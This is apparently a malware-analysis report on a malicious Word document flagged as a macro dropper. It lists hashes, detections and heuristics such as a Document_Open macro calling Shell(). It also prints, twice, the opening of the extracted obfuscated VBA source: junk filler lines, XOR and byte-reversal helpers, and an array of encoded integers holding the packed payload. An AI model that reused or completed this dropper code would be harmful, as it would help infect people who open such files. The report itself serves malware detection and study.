Office (OLE) malware analysis — malicious · 5f93acc4be8d91ad

MALICIOUS

Office (OLE)

205.0 KB Created: 2016-02-02 22:17:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: 3d5d036f87c0aa50233ed8056a16a8cd SHA-1: 82659d7c6b7b12e2dbcb4872c621027b539ba442 SHA-256: 5f93acc4be8d91ad1e5c1bef29a86d665af864f32e02ac62da2d6db6e5302c13

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates the macro is designed to execute external commands, a common technique for downloading and running additional malicious payloads. The ClamAV detection name 'Doc.Dropper.Agent-6387328-0' further supports its role as a dropper.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6387328-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6387328-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.iec.ch In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 68493 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	68493 bytes
SHA-256: `1c18770591bba26ace00384307fdef7efe668915f536f783adb17faaf6b3a44f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim EZBUxrMgti(1928) As Long Function VGda0v(CVRuQ3qS4e33O As Long) As Byte() GLP = Year(Now) '66 Dim Y3yISIg5P(3) As Byte, KiowXBd1q9cprQgD6 As Long, Eh9Eufe4j0Ph As Byte DWQtYLunihx = Year(Now) '49 For KiowXBd1q9cprQgD6 = 0 To 3 Y3yISIg5P(KiowXBd1q9cprQgD6) = (Int(CVRuQ3qS4e33O / (2 ^ (8 * (3 - KiowXBd1q9cprQgD6))))) And ((2 ^ 8) - 1) Next KiowXBd1q9cprQgD6 Kl3YBIXppostZ = Year(Now) '52 For KiowXBd1q9cprQgD6 = 0 To UnnkInXZpTNxhldyX(Y3yISIg5P) \ 2 Eh9Eufe4j0Ph = Y3yISIg5P(KiowXBd1q9cprQgD6) Y3yISIg5P(KiowXBd1q9cprQgD6) = Y3yISIg5P(UnnkInXZpTNxhldyX(Y3yISIg5P) - KiowXBd1q9cprQgD6) Y3yISIg5P(UnnkInXZpTNxhldyX(Y3yISIg5P) - KiowXBd1q9cprQgD6) = Eh9Eufe4j0Ph Next KiowXBd1q9cprQgD6 EDVA83hipPoXI6 = Year(Now) '24 ReDim VGda0v(3) As Byte EZ3anepbmJd = Year(Now) '71 VGda0v = Y3yISIg5P WI1LOrb8uvzn = Year(Now) '7 End Function Function LX8y7Eu(QMDzoFzMzryYTOZV, RtYQC) KTJ45dvAGAX8jRjoF = Year(Now) '17 LX8y7Eu = (QMDzoFzMzryYTOZV And Not RtYQC) Or (Not QMDzoFzMzryYTOZV And RtYQC) IaUgs = Year(Now) '56 End Function Sub VVjDWvBSA() EZBUxrMgti(0) = -1216365514 EZBUxrMgti(1) = -391788152 EZBUxrMgti(2) = 2027679526 EZBUxrMgti(3) = -375198929 EZBUxrMgti(4) = -2003149401 EZBUxrMgti(5) = 1882876980 EZBUxrMgti(6) = -1322499116 EZBUxrMgti(7) = -5723738 EZBUxrMgti(8) = 1068129616 EZBUxrMgti(9) = -1007323543 EZBUxrMgti(10) = -1928797872 EZBUxrMgti(11) = -269304919 EZBUxrMgti(12) = 1128308244 EZBUxrMgti(13) = 741998454 EZBUxrMgti(14) = -2021644803 EZBUxrMgti(15) = -51279042 EZBUxrMgti(16) = 1292876241 EZBUxrMgti(17) = -627703807 EZBUxrMgti(18) = 534159863 EZBUxrMgti(19) = 530390716 EZBUxrMgti(20) = -1269711569 EZBUxrMgti(21) = 1915484864 EZBUxrMgti(22) = 1832650568 EZBUxrMgti(23) = 220456815 EZBUxrMgti(24) = -1656951883 EZBUxrMgti(25) = -1577247004 EZBUxrMgti(26) = -18678344 EZBUxrMgti(27) = 2033417728 EZBUxrMgti(28) = -633059296 EZBUxrMgti(29) = -685541798 EZBUxrMgti(30) = -1587526070 EZBUxrMgti(31) = -679977201 EZBUxrMgti(32) = -1576264837 EZBUxrMgti(33) = -1598415633 EZBUxrMgti(34) = 93876531 EZBUxrMgti(35) = 1319757431 EZBUxrMgti(36) = 1673020866 EZBUxrMgti(37) = 1488120867 EZBUxrMgti(38) = -2092578478 EZBUxrMgti(39) = 642870006 EZBUxrMgti(40) = 1738378266 EZBUxrMgti(41) = 2027024086 EZBUxrMgti(42) = 1309077496 EZBUxrMgti(43) = -730534698 EZBUxrMgti(44) = -1829978206 EZBUxrMgti(45) = 1473844317 EZBUxrMgti(46) = 445968286 EZBUxrMgti(47) = 1802056272 EZBUxrMgti(48) = -1424488361 EZBUxrMgti(49) = 991713433 EZBUxrMgti(50) = 44443320 EZBUxrMgti(51) = -1300872522 EZBUxrMgti(52) = 1993599935 EZBUxrMgti(53) = -1463122895 EZBUxrMgti(54) = -1477541869 EZBUxrMgti(55) = -1427691169 EZBUxrMgti(56) = 1888249558 EZBUxrMgti(57) = 1666851206 EZBUxrMgti(58) = 1167163538 EZBUxrMgti(59) = -1591008728 EZBUxrMgti(60) = 1200564505 EZBUxrMgti(61) = 220061381 EZBUxrMgti(62) = 1813488635 EZBUxrMgti(63) = 501339776 EZBUxrMgti(64) = -384504673 EZBUxrMgti(65) = 1510740506 EZBUxrMgti(66) = -492856536 EZBUxrMgti(67) = -1900746881 EZBUxrMgti(68) = -686569802 EZBUxrMgti(69) = -1717281866 EZBUxrMgti(70) = -1313650096 EZBUxrMgti(71) = -1166294070 EZBUxrMgti(72) = 970671303 EZBUxrMgti(73) = -1301433952 EZBUxrMgti(74) = -431379324 EZBUxrMgti(75) = 1201403954 EZBUxrMgti(76) = -184154001 EZBUxrMgti(77) = 1424884037 EZBUxrMgti(78) = 1221967930 EZBUxrMgti(79) = 297757055 EZBUxrMgti(80) = 2017765735 EZBUxrMgti(81) = -778966938 EZBUxrMgti(82) = 1084314985 EZBUxrMgti(83) = 1204195672 EZBUxrMgti(84) = -1816697920 EZBUxrMgti(85) = 1687759259 EZBUxrMgti(86) = -41985771 EZBUxrMgti(87) = 1993143836 EZBUxrMgti(88) = 1805314717 EZBUxrMgti(89) = 836518297 EZBUxrMgti(90) = -960099179 EZBUxrMgti(91) = 979136471 EZBUxrMgti(92) = -16550094 EZBUxrMgti(93) = -1138629832 EZBUxrMgti(94) = 1426245014 ... (truncated)

SHA-256: 1c18770591bba26ace00384307fdef7efe668915f536f783adb17faaf6b3a44f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim EZBUxrMgti(1928) As Long
Function VGda0v(CVRuQ3qS4e33O As Long) As Byte()
GLP = Year(Now) '66
Dim Y3yISIg5P(3) As Byte, KiowXBd1q9cprQgD6 As Long, Eh9Eufe4j0Ph As Byte
DWQtYLunihx = Year(Now) '49
For KiowXBd1q9cprQgD6 = 0 To 3
Y3yISIg5P(KiowXBd1q9cprQgD6) = (Int(CVRuQ3qS4e33O / (2 ^ (8 * (3 - KiowXBd1q9cprQgD6))))) And ((2 ^ 8) - 1)
Next KiowXBd1q9cprQgD6
Kl3YBIXppostZ = Year(Now) '52
For KiowXBd1q9cprQgD6 = 0 To UnnkInXZpTNxhldyX(Y3yISIg5P) \ 2
Eh9Eufe4j0Ph = Y3yISIg5P(KiowXBd1q9cprQgD6)
Y3yISIg5P(KiowXBd1q9cprQgD6) = Y3yISIg5P(UnnkInXZpTNxhldyX(Y3yISIg5P) - KiowXBd1q9cprQgD6)
Y3yISIg5P(UnnkInXZpTNxhldyX(Y3yISIg5P) - KiowXBd1q9cprQgD6) = Eh9Eufe4j0Ph
Next KiowXBd1q9cprQgD6
EDVA83hipPoXI6 = Year(Now) '24
ReDim VGda0v(3) As Byte
EZ3anepbmJd = Year(Now) '71
VGda0v = Y3yISIg5P
WI1LOrb8uvzn = Year(Now) '7
End Function
Function LX8y7Eu(QMDzoFzMzryYTOZV, RtYQC)
KTJ45dvAGAX8jRjoF = Year(Now) '17
LX8y7Eu = (QMDzoFzMzryYTOZV And Not RtYQC) Or (Not QMDzoFzMzryYTOZV And RtYQC)
IaUgs = Year(Now) '56
End Function
Sub VVjDWvBSA()
EZBUxrMgti(0) = -1216365514
EZBUxrMgti(1) = -391788152
EZBUxrMgti(2) = 2027679526
EZBUxrMgti(3) = -375198929
EZBUxrMgti(4) = -2003149401
EZBUxrMgti(5) = 1882876980
EZBUxrMgti(6) = -1322499116
EZBUxrMgti(7) = -5723738
EZBUxrMgti(8) = 1068129616
EZBUxrMgti(9) = -1007323543
EZBUxrMgti(10) = -1928797872
EZBUxrMgti(11) = -269304919
EZBUxrMgti(12) = 1128308244
EZBUxrMgti(13) = 741998454
EZBUxrMgti(14) = -2021644803
EZBUxrMgti(15) = -51279042
EZBUxrMgti(16) = 1292876241
EZBUxrMgti(17) = -627703807
EZBUxrMgti(18) = 534159863
EZBUxrMgti(19) = 530390716
EZBUxrMgti(20) = -1269711569
EZBUxrMgti(21) = 1915484864
EZBUxrMgti(22) = 1832650568
EZBUxrMgti(23) = 220456815
EZBUxrMgti(24) = -1656951883
EZBUxrMgti(25) = -1577247004
EZBUxrMgti(26) = -18678344
EZBUxrMgti(27) = 2033417728
EZBUxrMgti(28) = -633059296
EZBUxrMgti(29) = -685541798
EZBUxrMgti(30) = -1587526070
EZBUxrMgti(31) = -679977201
EZBUxrMgti(32) = -1576264837
EZBUxrMgti(33) = -1598415633
EZBUxrMgti(34) = 93876531
EZBUxrMgti(35) = 1319757431
EZBUxrMgti(36) = 1673020866
EZBUxrMgti(37) = 1488120867
EZBUxrMgti(38) = -2092578478
EZBUxrMgti(39) = 642870006
EZBUxrMgti(40) = 1738378266
EZBUxrMgti(41) = 2027024086
EZBUxrMgti(42) = 1309077496
EZBUxrMgti(43) = -730534698
EZBUxrMgti(44) = -1829978206
EZBUxrMgti(45) = 1473844317
EZBUxrMgti(46) = 445968286
EZBUxrMgti(47) = 1802056272
EZBUxrMgti(48) = -1424488361
EZBUxrMgti(49) = 991713433
EZBUxrMgti(50) = 44443320
EZBUxrMgti(51) = -1300872522
EZBUxrMgti(52) = 1993599935
EZBUxrMgti(53) = -1463122895
EZBUxrMgti(54) = -1477541869
EZBUxrMgti(55) = -1427691169
EZBUxrMgti(56) = 1888249558
EZBUxrMgti(57) = 1666851206
EZBUxrMgti(58) = 1167163538
EZBUxrMgti(59) = -1591008728
EZBUxrMgti(60) = 1200564505
EZBUxrMgti(61) = 220061381
EZBUxrMgti(62) = 1813488635
EZBUxrMgti(63) = 501339776
EZBUxrMgti(64) = -384504673
EZBUxrMgti(65) = 1510740506
EZBUxrMgti(66) = -492856536
EZBUxrMgti(67) = -1900746881
EZBUxrMgti(68) = -686569802
EZBUxrMgti(69) = -1717281866
EZBUxrMgti(70) = -1313650096
EZBUxrMgti(71) = -1166294070
EZBUxrMgti(72) = 970671303
EZBUxrMgti(73) = -1301433952
EZBUxrMgti(74) = -431379324
EZBUxrMgti(75) = 1201403954
EZBUxrMgti(76) = -184154001
EZBUxrMgti(77) = 1424884037
EZBUxrMgti(78) = 1221967930
EZBUxrMgti(79) = 297757055
EZBUxrMgti(80) = 2017765735
EZBUxrMgti(81) = -778966938
EZBUxrMgti(82) = 1084314985
EZBUxrMgti(83) = 1204195672
EZBUxrMgti(84) = -1816697920
EZBUxrMgti(85) = 1687759259
EZBUxrMgti(86) = -41985771
EZBUxrMgti(87) = 1993143836
EZBUxrMgti(88) = 1805314717
EZBUxrMgti(89) = 836518297
EZBUxrMgti(90) = -960099179
EZBUxrMgti(91) = 979136471
EZBUxrMgti(92) = -16550094
EZBUxrMgti(93) = -1138629832
EZBUxrMgti(94) = 1426245014

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.